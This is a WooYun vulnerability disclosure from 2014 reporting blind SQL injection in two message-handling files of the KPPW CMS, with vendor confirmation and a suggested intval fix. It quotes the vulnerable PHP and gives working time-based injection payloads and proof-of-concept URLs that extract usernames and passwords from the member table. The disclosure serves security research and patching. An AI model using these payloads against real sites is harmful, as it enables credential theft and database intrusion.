当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-086378

漏洞标题:KPPW最新版SQL注入漏洞六(多处盲注附脚本)

相关厂商:keke.com

漏洞作者: xfkxfk

提交时间:2014-12-09 12:58

修复时间:2015-03-09 13:00

公开时间:2015-03-09 13:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-09: 细节已通知厂商并且等待厂商处理中
2014-12-10: 厂商已经确认,细节仅向厂商公开
2014-12-13: 细节向第三方安全合作伙伴开放
2015-02-03: 细节向核心白帽子及相关领域专家公开
2015-02-13: 细节向普通白帽子公开
2015-02-23: 细节向实习白帽子公开
2015-03-09: 细节向公众公开

简要描述:

KPPW最新版SQL注入漏洞六,漏洞太多了,肯定是程序猿偷懒,没有安全意识,导致多处盲注,附跑数据的脚本,这里把同一模块的漏洞都提交到一起把,避免刷漏洞的嫌疑

详细说明:

KPPW最新版SQL注入漏洞六,漏洞太多了,肯定是程序猿偷懒,没有安全意识,导致多处盲注
这里把同一模块的漏洞都提交到一起把,避免刷漏洞的嫌疑
sql注入一
文件/control/user/message_notice.php

<?php defined ( 'IN_KEKE' ) or exit('Access Denied');
$objMsgT = keke_table_class::get_instance ( 'witkey_msg' );
$strUrl = 'index.php?do=user&view=message&op=notice';
$intPage and $strUrl .= '&intPage=' . $intPage;
$intPagesize and $strUrl .= '&intPagesize=' . $intPagesize;
if (isset ( $action )) {
switch ($action) {
case 'mulitDel' :
if ($ckb) {
$objMsgT->del ( 'msg_id', $ckb );
kekezu::show_msg ( '删除成功', $strUrl, NULL, NULL, 'ok' );
} else {
kekezu::show_msg ( '删除失败', NULL, NULL, NULL, 'error' );
}
break;
case 'delSingle' :
if ($objId) {
$objMsgT->del ( 'msg_id', $objId );
kekezu::show_msg ( '删除成功', $strUrl, NULL, NULL, 'ok' );
} else {
kekezu::show_msg ( '删除失败', NULL, NULL, NULL, 'error' );
}
break;
case 'mulitView' :
if ($ckb) {
is_array ( $ckb ) and $strMsgId = implode ( ",", $ckb );
$arrDatas = db_factory::query ( "select * from " . TABLEPRE . "witkey_msg where msg_id in ($strMsgId)" );
foreach ( $arrDatas as $v ) {
if ($gUid == $v ['to_uid'] && $v ['view_status'] < 1) {
db_factory::execute ( "update " . TABLEPRE . "witkey_msg set view_status=1 where msg_id = " . intval ( $v ['msg_id'] ) );
}
}
} else {
kekezu::show_msg ( '设置失败', NULL, NULL, NULL, 'error' );
}
kekezu::show_msg ( '设置成功', $strUrl, NULL, NULL, 'ok' );
break;
}


当action=mulitView时:

case 'mulitView' :
if ($ckb) {
is_array ( $ckb ) and $strMsgId = implode ( ",", $ckb );
$arrDatas = db_factory::query ( "select * from " . TABLEPRE . "witkey_msg where msg_id in ($strMsgId)" );


遍历ckb存在,且为数组时,将ckb用逗号分隔,付给strMsgId变量
最后strMsgId变量直接导入sql语句,导致sql注入漏洞产生
当然在删除消息时,del函数处也存在注入,这个在之前已经说过了
sql注入二
文件文件/control/user/message_privite.php

<?php defined ( 'IN_KEKE' ) or exit('Access Denied');
$objMsgT = keke_table_class::get_instance ( 'witkey_msg' );
$strUrl = 'index.php?do=user&view=message&op=private';
$intPage and $strUrl .= '&intPage=' . $intPage;
$intPagesize and $strUrl .= '&intPagesize=' . $intPagesize;
if (isset ( $action )) {
switch ($action) {
case 'mulitDel' :
if (is_array ( $ckb )) {
foreach ( $ckb as $v ) {
list ( $intMsgId, $intStatus ) = explode ( ',', $v );
if ($intStatus == 0) {
db_factory::execute ( "update " . TABLEPRE . "witkey_msg set msg_status=2 where msg_id = $intMsgId" );
} else {
$objMsgT->del ( 'msg_id', $intMsgId );
}
}
kekezu::show_msg ( '删除成功', $strUrl, NULL, NULL, 'ok' );
} else {
kekezu::show_msg ( '删除失败', NULL, NULL, NULL, 'error' );
}
break;


同样在删除时,del函数存在注入漏洞
还有就是参数ckb同样通过intMsgId进入了SQL语句,导致注入产生
但是这里有一个问题就是参数intMsgId不能有逗号,这样会导致截断,无法执行完整sql语句
这里我们使用无逗号的语句即可:

and CASE WHEN(mid((select group_concat(username,password) from keke_witkey_member) from 1 for 1)=char(97)) THEN sleep(5) ELSE (0) END

漏洞证明:

sqk注入一:

http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=message&op=notice&action=mulitView&ckb[]=1,2) and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23


此处会延迟返回
sql注入二:

http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=message&op=private&action=mulitDel&ckb[]=2 and CASE WHEN(mid((select group_concat(username) from keke_witkey_member) from 1 for 1)=char(97)) THEN sleep(5) ELSE (0) END,0


此处会延迟返回
看数据库执行日志:

1.png

修复方案:

加单引号保护或者使用intval即可

版权声明:转载请注明来源 xfkxfk@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-12-10 17:11

厂商回复:

已修改 QK

最新状态:

暂无